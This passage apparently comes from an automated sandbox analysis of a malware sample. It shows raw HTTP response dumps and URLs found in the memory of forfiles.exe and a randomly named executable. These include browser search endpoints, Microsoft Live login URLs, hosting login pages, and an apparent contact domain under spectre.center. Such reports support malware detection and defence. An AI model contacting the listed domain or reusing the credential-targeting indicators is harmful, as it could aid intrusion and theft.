65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 02 Oct 2024 13:18:01 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 02 Oct 2024 13:18:04 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 02 Oct 2024 13:18:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 02 Oct 2024 13:18:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 02 Oct 2024 13:18:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006092000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.00000000042B2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://giganet.ua/ru
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://inau.ua/
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006092000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.00000000042B2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://ogp.me/ns#
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://partner.mirohost.net
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://schema.org/Organization
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.ix.net.ua/ru
Source: AnbtBVreItY.exe, 0000000E.00000002.3133096714.0000000002EFA000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.spectre.center
Source: AnbtBVreItY.exe, 0000000E.00000002.3133096714.0000000002EFA000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.spectre.center/mfnh/
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://admin.active24.cz/
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://admin.active24.cz/en
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Bold.otf
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Bold.woff2
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Medium.otf
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Medium.woff2
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Regular.otf
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.active24.eu/fonts/OTF/Active24-Regular.woff2
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://control.imena.ua/login.php?lang=2
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://control.mirohost.net/auth/login.php?lang=ru
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://img.imena.ua/css/media-set.css
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://img.imena.ua/js/bundle.min.js
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3122100683.0000000002F78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3122100683.0000000002F78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: forfiles.exe, 0000000C.00000003.1958965958.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://mail.mirohost.net
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/
Source: forfiles.exe, 0000000C.00000002.3136018758.00000000058B8000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/cart/domain-checker
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/support/
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000005726000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000003946000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: forfiles.exe, 0000000C.00000003.1964374693.0000000007F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/blog/
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/check-domain
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/check-domain?step=transfer
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/contact
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/datacenter
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/documents
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/domains
